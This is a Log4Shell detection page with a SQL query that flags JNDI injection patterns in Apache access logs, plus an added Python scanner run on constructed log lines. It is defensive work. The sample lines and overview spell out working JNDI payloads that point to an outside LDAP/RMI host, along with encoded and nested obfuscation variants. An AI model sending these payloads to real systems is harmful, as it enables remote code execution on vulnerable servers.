Detection: Log4Shell Vulnerability
Overview
Detect when a web server received requests containing Log4j/Log4Shell exploitation patterns (CVE-2021-44228, CVE-2021-45046). This detection focuses on identifying attempts to exploit a critical remote code execution vulnerability in the widely-used Log4j Java logging framework.
The Log4Shell vulnerability exploits Log4j's JNDI (Java Naming and Directory Interface) lookup functionality, which allows dynamic loading of Java classes. When Log4j logs a string containing a JNDI lookup expression (like ${jndi:ldap://malicious-server/payload}), it attempts to resolve the reference, potentially executing arbitrary code from a remote source. Attackers typically inject these JNDI expressions into fields that are likely to be logged, such as HTTP headers, form fields, and URL parameters.
Multiple variations of the attack exist, including obfuscation techniques to bypass detection, such as nested expressions, HTML entity encoding, and string manipulation functions used within the JNDI expression. This detection identifies both simple and sophisticated attack attempts by scanning for common JNDI injection patterns in HTTP request URIs and User-Agent headers, including standard patterns (${jndi:...}), nested expressions (${${...}}), URL-encoded variants (such as $%7bjndi:..., as matched by the query below), and obfuscated patterns using Log4j's lookup features (${lower:${upper:j}ndi}).
When this detection triggers, security teams should immediately isolate affected systems if possible, check if the exploitation attempt was successful by looking for unusual outbound connections or newly created files, update all Log4j installations to patched versions (2.17.0 or newer), implement web application firewall rules to block JNDI lookup patterns, scan all applications and dependencies for Log4j vulnerabilities, and enhance logging to identify potential compromises. While this detection may occasionally trigger on security scanning or legitimate applications using ${} syntax in parameters, these cases are extremely rare in normal web traffic.
Usage
Run the detection in your terminal:
powerpipe detection run apache_access_log_detections.detection.log4shell_vulnerability
Snapshot and share results via Turbot Pipes:
powerpipe login
powerpipe detection run apache_access_log_detections.detection.log4shell_vulnerability --share
SQL
This detection uses a named query. As reproduced here, the query pattern-matches request_uri only; http_user_agent is returned as the actor column but is not itself matched against the patterns.
select
  tp_timestamp as timestamp,
  request_method as operation,
  request_uri as resource,
  status,
  http_user_agent as actor,
  tp_source_ip as source_ip,
  tp_id as source_id,
  -- Create new aliases to preserve original row data
  status as status_src,
  timestamp as timestamp_src,
  * exclude (status, timestamp)
from
  apache_access_log
where
  request_uri is not null
  and (
    -- JNDI lookup patterns
    request_uri ilike '%${jndi:%'
    or request_uri ilike '%$%7bjndi:%'
    or request_uri ilike '%${%7bjndi:%'
    or request_uri ilike '%jndi://%'
    -- Common protocol exploits
    or request_uri ilike '%jndi:ldap:%'
    or request_uri ilike '%jndi:dns:%'
    or request_uri ilike '%jndi:rmi:%'
    or request_uri ilike '%jndi:http:%'
    or request_uri ilike '%jndi:iiop:%'
    or request_uri ilike '%jndi:corba:%'
    -- Base64 encoded variants
    or request_uri ilike '%jTmRp%'
    or request_uri ilike '%ak5kaQ%'
    or request_uri ilike '%JE5ESQB%'
    or request_uri ilike '%SnNkaQ%'
  )
order by
  tp_timestamp desc;
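As an added example (not part of the apache_access_log_detections mod or of the query above), the following Python reproduces the query's indicator list over a few constructed Apache combined-format log lines, adds the lookup-obfuscation pattern described in the overview (${lower:${upper:j}ndi}), and shows two checks a practitioner would want that the SQL as reproduced does not perform: one round of URL-decoding (a request whose $ is sent as %24 matches none of the raw substring patterns) and matching the User-Agent as well as the URI. The log-format regex, the sample lines and their IP addresses are constructed; the decoding step and the User-Agent check are this example's own additions. One difference to be aware of: the query's '%$%7bjndi:%' pattern contains a % inside %7b that DuckDB's ILIKE treats as a wildcard, while the strings here are matched as plain substrings, which is stricter.

```python
import re
import urllib.parse
from datetime import datetime

# Apache combined log format. The regex and the sample lines below are constructed for this example.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Substring indicators mirrored from the detection's SQL query, matched case-insensitively like ILIKE.
JNDI_PATTERNS = [
    "${jndi:", "$%7bjndi:", "${%7bjndi:", "jndi://",   # JNDI lookup patterns
    "jndi:ldap:", "jndi:dns:", "jndi:rmi:",             # common protocol exploits
    "jndi:http:", "jndi:iiop:", "jndi:corba:",
    "jTmRp", "ak5kaQ", "JE5ESQB", "SnNkaQ",             # base64-encoded variants
]

# Lookup obfuscation such as ${lower:${upper:j}ndi}: a second ${ opens before the outer one closes.
NESTED_LOOKUP_RE = re.compile(r"\$\{[^}]*\$\{")


def matches_log4shell(value):
    """True if value carries one of the JNDI indicators above.

    The value is checked raw and after one round of URL-decoding. The decoding is an
    addition to the page's query, which sees only the raw request_uri and therefore
    cannot match a fully encoded '%24%7Bjndi'.
    """
    if value is None:
        return False
    for text in (value, urllib.parse.unquote(value)):
        lowered = text.lower()
        if any(p.lower() in lowered for p in JNDI_PATTERNS):
            return True
        if NESTED_LOOKUP_RE.search(text):
            return True
    return False


def scan_access_log(lines):
    """Parse combined-format lines and return hits shaped like the query's columns, newest first.

    Unlike the page's query, the User-Agent is pattern-matched too (an assumption of this example).
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        rec = m.groupdict()
        if matches_log4shell(rec["uri"]):
            matched = "request_uri"
        elif matches_log4shell(rec["ua"]):
            matched = "http_user_agent"
        else:
            continue
        hits.append({
            "timestamp": datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "operation": rec["method"],
            "resource": rec["uri"],
            "status": int(rec["status"]),
            "actor": rec["ua"],
            "source_ip": rec["ip"],
            "matched_field": matched,
        })
    hits.sort(key=lambda h: h["timestamp"], reverse=True)
    return hits


# Constructed sample traffic: one benign request, three probes (raw, fully URL-encoded, nested
# lookup in the User-Agent), and one benign use of ${...} syntax that must not fire.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:14:03:27 +0000] "GET /?q=${jndi:ldap://203.0.113.10/x} HTTP/1.1" 200 42 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:14:04:01 +0000] "GET /login?user=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.10%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.12 - - [10/Dec/2021:14:05:45 +0000] "GET /api/v1/items HTTP/1.1" 200 88 "-" "${${lower:j}ndi:rmi://203.0.113.10/a}"',
    '198.51.100.8 - - [10/Dec/2021:14:06:00 +0000] "GET /search?template=${date:yyyy} HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["timestamp"].isoformat(), hit["source_ip"], hit["matched_field"], hit["resource"])
```

Running the block flags the three probes and leaves the ${date:yyyy} request alone, which is the false-positive case the overview mentions: a lone ${...} lookup does not fire, only a JNDI indicator or a nested lookup does. The fully encoded probe is caught solely because of the decoding step, so a deployment that keeps the query as-is should expect to miss that encoding unless an upstream layer decodes the URI before it is logged.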